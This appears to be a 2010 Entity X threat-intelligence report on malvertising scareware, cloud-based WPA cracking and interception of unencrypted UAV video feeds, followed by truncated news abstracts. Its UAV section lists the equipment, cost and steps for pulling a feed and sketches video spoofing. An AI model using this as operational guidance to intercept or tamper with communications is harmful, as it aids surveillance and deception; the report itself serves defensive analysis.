Beruflich Dokumente
Kultur Dokumente
About Entity X
Electronic warfare was formerly an issue for the military on the battlefield,
but now it affects every aspect of our lives, our work and our government.
At Entity X Inc we have recognized the growing significance of cyber threats
and net‑centric warfare. We’re a team of highly experienced IT professionals
working at the cutting edge of technology. Unlike conventional IT security firms
we seek to develop in our clients a greater and deeper understanding of the
range of disparate yet rapidly evolving threats that governments, businesses and
individuals face. Entity X Inc produces the Daedalus report series to inform and
brief our clients and we also provide consultancy and training in this specialized
but increasingly significant field.
Contact Contributors
info@entity-x.com Robi Sen, Analysis Director, Entity X
Ian Starnes, Senior Analyst, Entity X
Shane Frasier, Senior Analyst, Entity X
All material © Entity X Inc, 2010. All rights reserved. Not for further distribution.
Summary
• Awareness and up-to-date antivirus tools will protect users
• However, the vector is novel and with greater sophistication it could
pose real challenges
• The potential for such vectoring to target specific users through social engineering is
the most significant implication and raises broad concerns
• Security professionals and policy makers should consider these potentialities
• These vectors have implications for how advertising space is sold and bought on
websites, considering that the buyer can host adverts on their own server
There have been a number of new attack vectors by scareware and scamware groups
that have important ramifications for security professionals. Both attack trends make novel
use of established and trusted commercial companies to disseminate or manage attacks and
provide command and control support. This creates scenarios which could inspire more
sophisticated malware distributors or hostile actors to use the same techniques to rapidly
disseminate malware through these normally trusted channels. Such trends need to be
carefully monitored because of their great potential for cyber warfare, cyber espionage, and
information operations.
The user is advised to download and install an antivirus application, which is in fact
malware. If successfully duped, the user’s computer will be infected with a real malware
application and they will then be pestered by the scareware group into paying for its removal.
Many, but not all, antivirus tools will warn of an ‘HTTP fake website attack’, but once the
malware is installed it can be very difficult to remove. Moreover, this particular attack will not be
the last to use advertising platforms to disseminate malware.
Threat Overview
This method of attack, when a company or group posing as a legitimate company buys
advertising, was quickly adopted by scareware distributors and similar attacks were soon
made from numerous other websites. The attack, which is really a form of social engineering,
makes use of the fact that clients are able to host advertising on their own servers, which
allows the scareware distributors, posing as legitimate clients, to swap the approved advert
with one that attempts to scare the user into downloading malware.
These sorts of scareware scams are an enormous problem and one of the worst offenders is the
‘Koobface’ gang, also known as ‘Ali Baba and the 40 Thieves LLC’ – see Figure 1. Koobface
specializes in using trusted commercial entities such as Facebook, Twitter, and Myspace, to
spread its viruses and command and control services for its Koobface botnets. Furthermore,
the Koobface gang was behind a significant black hat search engine optimization scheme
focused on Google that attempted to game popular search terms, such as ‘9/11’, so that its web
pages and links were ranked at the top of the search results. When a user clicked on
a link, Koobface attempted similar scareware attacks as outlined above or attempted to push
malware directly on to the user’s computer.
While most of these attacks are often relatively simplistic, easy to detect, generally only target
Windows computers, and often require a large amount of user interaction and social engineering
to succeed, there is nothing stopping attackers from pushing more sophisticated or direct attacks
on the user. This is where the real concern lies.
While such an attack is easy to detect via normal antivirus tools and is essentially a social
engineering attack, a more sophisticated organization could use this same vector as a low-
cost, efficient method for the targeted dissemination of malware. An organization with hostile
intentions could simply create a shell company or pretend to be a legitimate company to
buy advertising space in a targeted community. For example, an Iranian organization could
buy advertising space in the Los Angeles Times or a newspaper in a community with a large
population of dissident Iranians. It could then use much more sophisticated exploits that are
harder for antivirus software to defeat, or offer items like free ‘Iranian MP3s’ or ‘movies’,
which may also contain malware that would be able to install backdoors in some of the
targeted users.
Implications
Security professionals: Consider raising awareness of such tactics to your staff and
review processes which allow advertising buyers to host their own adverts.
Policy makers: Consider social engineering vector and its policy implications.
Intelligence professionals: Consider black hat/white hat potential of such activity.
Summary
• Raises awareness of the insecurity of WPA and WPA2
• Potential for the use of such platforms for unprecedented large-scale exploitation of
wireless systems, encryption keys, and security systems
Indeed, many network administrators rely on the time-consuming process of brute force
decryption of WPA keys to deter wardrivers or other less committed attackers. What is
worse is that some network administrators hold the mistaken belief that WPA is secure from
any form of decryption attack, with the exception of a supercomputer, something they often
incorrectly assume no hacker has access to. As such, the Web Cracker service offers the
potential to greatly increase the ease of exploitation of wireless networks for malicious users
and potentially exposes all information and systems that use such networks.
Threat Overview
Web Cracker (and cheap home-built supercomputers) also increases the likelihood of large-
scale exploitation of wireless systems because individuals could easily survey an area with a
laptop or other device equipped with an 802.11 radio (potentially any smart phone) and collect
all the WPA keys in the area. These keys could then be uploaded to a WPA cracking cluster
like Web Cracker or purpose-built mini supercomputers for later mass exploitation. A highly
resourceful malcontent could even seed an area, such as an office, with a number of wireless
devices that could send back the WPA key using other methods of transport. Once the keys
are decrypted and delivered back to the devices they could unobtrusively act as Wi-Fi bugs,
collecting all information coming over access points in the building and then redirecting it.
For a few thousand dollars a sophisticated attacker could emplace such wireless bugs at key
access points and then, by combing it with something like Shodan (see the Entity X Daedalus
Special Report on the subject of the SHODAN search engine.), create a system to discover,
enumerate, and automate the large-scale exploitation of numerous targeted systems in near
real time. For example, a hacker could emplace Wi-Fi bugs around an office park and crack
the WPA encryption on its Wi-Fi access points. Then from there they could have a tool sniff
for all the HTTP headers coming out of poorly secured or configured devices such as web
cameras and potentially, in near real time, discover when a user opens their laptop, sets up
a video over Internet Protocol chat, and watch it in real time. Of course, all the methods
described here could also be used by law enforcement or security services.
While the Web Cracker service is potentially a great boon for IT security specialists
to demonstrate the insecurity of wireless protocols, it offers even more opportunities to
malicious users. While Entity-X in no way suggests that this is the intent of the Web
Cracker service, we believe that it demonstrates a clear trend in the increasing availability
and low cost of high-performance computing being used to crack security systems. We
therefore recommend that our readers reconsider their security policies, reduce or remove
the use of Wi-Fi systems, and use virtual private networks (VPNs) over their Wi-Fi access
points. Furthermore, all third-party Wi-Fi access points should be assumed to have been
exploited and users with sensitive information on their systems should never use Wi-Fi points
at coffee houses, hotels or other uncontrolled environments.
Implications
Security professionals: Web Cracker is a potentially useful tool for IT security
professionals to test wireless network security. Network administrators or security
officers should consider banning the use of wireless access points. Educate users to not
use Wi-Fi access points for telecommuting even if they are using a VPN.
Policy makers: Consider social engineering vector and its policy implications.
Intelligence professionals: Consider black hat/white hat potential of such activity.
Summary
• While the issue of enemies listening or watching communications is serious, there is
no indication that systems are able to be hacked or were hacked in any way
• Increased awareness is likely good for the industry which needs to realize that it must
perform security audits by third-party experts for any platform that communicates
with any other system
On December 17, 2009, The Wall Street Journal inaccurately reported in another story,
highlighting a known weakness of Predator video feeds: the lack of encryption between
the drone and soldiers on the ground. The video feed can be intercepted by anyone with
an antenna capable of receiving a signal and hardware that can decode it. In the case of
the insurgents, it appears they were using a simple satellite television antenna, a laptop
computer, and a software product called SkyGrabber that simply decodes the video
signal into formats that can be played on a computer or copied to DVD.
It is not particularly surprising that Iraqi insurgents chose to use this method because in
the Middle East satellite TV is either expensive or restricted, therefore there are numerous
individuals with experience in finding alternative ways of accessing it, who can also provide
tools and training to those who wish to have similar expertise. In this case the insurgents
simply had to take advantage of this same expertise already in the region to intercept the
line-of-site video feeds from UAVs.
Therefore, the Wall Street Journal was not accurate in describing the tactic as ‘hacking’ since
neither the UAV nor the signal was hacked; it was intercepted in the clear. However, in
many ways this is worse because it demonstrates a complete lack of security and awareness of
oppositional capability, especially given the ease with which a signal can be intercepted.
Threat Overview
Intercepting UAVs and other military platforms’ line-of-site video feeds is relatively
simple. First, you need a satellite antenna to receive a signal. Typically this is a dish
antenna like those used for commercial satellite cable and internet services. Secondly,
you need a digital video broadcasting (DVB or DVB-S for satellite) PC card or USB
modem which is used to decode, or encode, the signal received from the satellite dish. The
DVB-S card or USB modem then needs to be connected to a computer which, running
software like SkyGrabber, can then be used to view, edit, or process the received signals
as needed. Once the user has all necessary components, they simply need to know what
frequency the target source is transmitting at so they can then pull the available signal.
Figure 2. provides an example of how an insurgent in an area where a UAV is operating
could gain access to a signal.
The laptop, DVB-S device, antenna, and software can all be purchased for a
combined cost of less than US$1,500. The components can be obtained for
even less through used electronics stores or retailers.
Once the user is able to acquire a signal, they can use software to convert it into a variety of
video formats for distribution and viewing (see Figure 3.). As such, the ease of intercepting
the signal coupled with the simplicity of distributing videos over the internet offers serious
potential harm to the US military or other organizations using similar unencrypted line-
of-site video transmission. Not only can opponents gain real-time tactical information but
also, and perhaps more importantly, the video can be used for information operations and
propaganda purposes.
A more concerning capability is the near real-time interception and editing of line-of-site
video, which could be used to subtly corrupt or confuse legitimate users of the video feeds. It
is possible for an opponent to perform a man-in-the-middle attack of such signals by acting
as a proxy. The opponent, for example, could intercept the feed and start to relay it to a
legitimate user and then, at the right moment, inject a manufactured image. For instance, the
image could show a group of hostiles in a building setting up a portable missile launcher, and
this could then trigger preemptive firing from the legitimate user on the ‘ghost’ target. This
would be an effective method for insurgents, terrorists, and malcontents in general, to wage
successful information operations to create controversy with little to no risk to themselves. At
the same time these issues create opportunities for the Department of Defense (DoD) and other
organizations to perform their own information operations.
Such a system to intercept, spoof, and relay near real-time edited video
content would generally be outside the reach of insurgents. However, it
could be achieved by talented engineering students who have access to the
necessary equipment and software, which can be procured commercially
and via open source.
Figure 3. Image
showing a SkyGrabber
tutorial from a forum
explaining how to use
the application to
retrieve files
While the best method to deal with the current problem with unsecured video feeds is to
rapidly move to systems and methods that secure all communications end to end, this
is not likely to happen soon for a variety of reasons, few of which have to do with technology.
One method proposed by some at the United States Naval Institute is to inject exploits in
the video feeds being transmitted, which would allow the DoD to monitor who is intercepting
these feeds. While this is not necessarily a bad idea, it is very likely that the exploits would
be shortly discovered, reverse engineered, and then used to target both DoD assets and
commercial users for nefarious purposes. Indeed, sophisticated opponents could potentially
perform man-in-the-middle type attacks and inject their own malware targeting DoD devices,
which are also potentially exploitable and once again highlight the larger issue of end-to-end
information protection and assurance.
Regardless, the security issues that have come to the fore regarding unsecured direct line-
of-site video communications pose serious issues to active forces that potentially could
lead to a much greater issue of general information corruption and manipulation by
sophisticated state actors of US information systems.
Implications
Security professionals: Relying on obscurity versus a robust security chain is a
poor choice. Consider mechanisms beyond just standard encryption to certify the
trustworthiness of information in an enterprise. Educate stakeholders on the risks of
not doing security testing.
Policy makers: Publicly funded information systems need to be audited by
professional third-party security experts.
Intelligence professionals: Consider risks of relying on unencrypted sensor
platforms. Realize that even ‘secure’ video and audio systems can be monitored
and corrupted. Realize the opportunity in video and voice over IP monitoring and
spoofing.
Cyber spies can be anyone, anywhere and may have any motive
The Vancouver Sun (British Columbia) November 7, 2009 Saturday Final Edition Cyber
spies can be anyone, anywhere and may have any motive BYLINE: Wesley Wark, Special
to the Sun SECTION: ISSUES & IDEAS; Pg. C4 LENGTH: 904 words Not long after an
Italian inventor, Guglielmo Marconi, proved that messages could be sent through the air
over long distances by radio, modern espionage went airborne. The First World War was
just around the corner. Spy services were tasked to hunt out not just enemy agents but the
radio whispers of friends and foes, in a new form of intelligence gathering called SIGINT
(signals intelligence).
Date : 09/02/2010 ( Source : THE VANCOUVER SUN )
CAUGHT IN $9 MILLION FRAUD Major Credit Card Processor Victimized in Elaborate Theft
of Account Numbers WASHINGTON - Sergei Tsurikov, 25, of Tallinn, Estonia; Viktor Pleshchuk,
28, of St. Petersburg, Russia; Oleg Covelin, 28, of Chisinau, Moldova; and a person known only
as “Hacker 3;” have been indicted by a federal grand jury in Atlanta, Ga., on charges of hacking
into a computer network operated by the Atlanta-based credit card processing company RBS
WorldPay, which is part of the Royal Bank of Scotland , announced Assistant Attorney General of
the Criminal Division Lanny A. Breuer; Acting U.S. Attorney Sally Quillian Yates of the Northern
District of Georgia; and Special Agent-in-Charge Greg Jones of the Atlanta Field Office of the FBI.
Date : 09/02/2010 ( Source : Justice Department Documents and Publications )
Knockout Punch
Defense Technology International December 1, 2009 Knockout Punch BYLINE: David A.
Fulghum SECTION: Non-Kinetic Warfare; Pg. 38 Vol. 3 No. 11 LENGTH: 1463 words David
A. Fulghum?Washington The U.S. is moving rapidly in the development of next-generation
weapons for cyber-combat, electronic attack, network invasion, information operations and other
non-kinetic warfare. But so are others. Potential enemies and non-state foes are employing digital
weapons, while allied defenses against them lag. Organized crime, cyber-thieves, industrial spies
and specially trained military operators are creating network breaches faster than they can be
repaired.
Date : 09/02/2010 ( Source : Defense Technology International )
Microsoft COFEE, Some of the Most Illegal Software You Can Pirate
[Hacking]
Gizmodo November 7, 2009 Saturday 2:00 PM EST Microsoft COFEE, Some of the Most
Illegal Software You Can Pirate [Hacking] LENGTH: 118 words Nov. 7, 2009 (Gawker Media
delivered by Newstex) -- Apparently Microsoft ‘s (NASDAQ:MSFT) COFEE software that helps
law enforcement grab data from password protected or encrypted sources is leaking all over the
internet. So not only can you steal the software, but break the law by using it too. Yep, it’s all out
there on the internet, but if you use it to grab private data from someone else’s computer chances
are you’re in for a world of legal hurt.
Date : 09/02/2010 ( Source : Gizmodo )
company. The report’s findings come less than a month after the United States ran a nationwide
campaign to raise awareness of cybercrime risks among individuals and businesses. “Is the age of
cyberwar at hand?” McAfee asked in the report, citing evidence that countries hostile to industrial
democracies are involved in some of the more serious and sustained cybercrime.
Date : 09/02/2010 ( Source : UPI )
Justice’s Federal Bureau of Investigation Boston Field Office issued the following press release:
Charges were unsealed in federal court against an Oregon man and the company he founded,
TCNISO, alleging that they developed and distributed products that allowed users to modify
their cable modems and obtain internet access without paying for it.
Date : 09/02/2010 ( Source : US FED NEWS )
UAV hacking
Marine Corps Times December 28, 2009 Monday UAV hacking SECTION: SIT REP;
Pg. 3 LENGTH: 427 words Iraqi insurgents have been capturing the nonsecure, line-of-
sight communications signals from unmanned aerial vehicles such as the MQ-1 Predator
and MQ-9 Reaper since mid-2008, Defense officials have confirmed. Some military leaders
have downplayed the risks, but others say it’s giving insurgents an edge. As far back as 1996,
the military has known that outsiders can see these video feeds, which have been vital to
Marines and other ground troops in Iraq and Afghanistan.
Date : 09/02/2010 ( Source : MARINE CORPS TIMES )
the latest Apple software from AT&T ‘s wireless network,Apple is looking for a sheriff to
lock the smartphones back up again, permanently. Motorola Droid vs. Apple iPhone 3GS:
finally, a contender? A job posting on Apple corporate Web site seeks a security manager
for the iPhone platform to lead a team focused on secure booting and installation of the
operating system, cryptographic services, partitioning and hardening its internal security
domains, and risk analysis of security threats.
Date : 09/02/2010 ( Source : NETWORK WORLD )
to complexity of systems and human fallibility; calls for rigorous testing under simulated
real-life and extreme loads to ensure intranet remains fast and efficient under all loads
and circumstances; regards endpoint and perimeter security as weakest links, and
subtle manipulation of data and people as greatest threat LOAD-DATE: December 23,
2009 LANGUAGE: ENGLISH DOCUMENT-TYPE: EDITORIAL COLUMN
PUBLICATION-TYPE: Abstract JOURNAL-CODE: JDW Copyright 2009 The New York
Times Company All Rights Reserved Information Bank Abstracts
Date : 09/02/2010 ( Source : JANE’S DEFENCE WEEKLY )
to try and hack into our networks, and we are aware of our enemies’ capabilities.” On
Tuesday, head of Military Intelligence Maj-Gen Amos Yadlin warned of the growing cyber
warfare threat against Israel and around the world.
Date : 09/02/2010 ( Source : BBC MONITORING MIDDLE EAST - POLITICAL )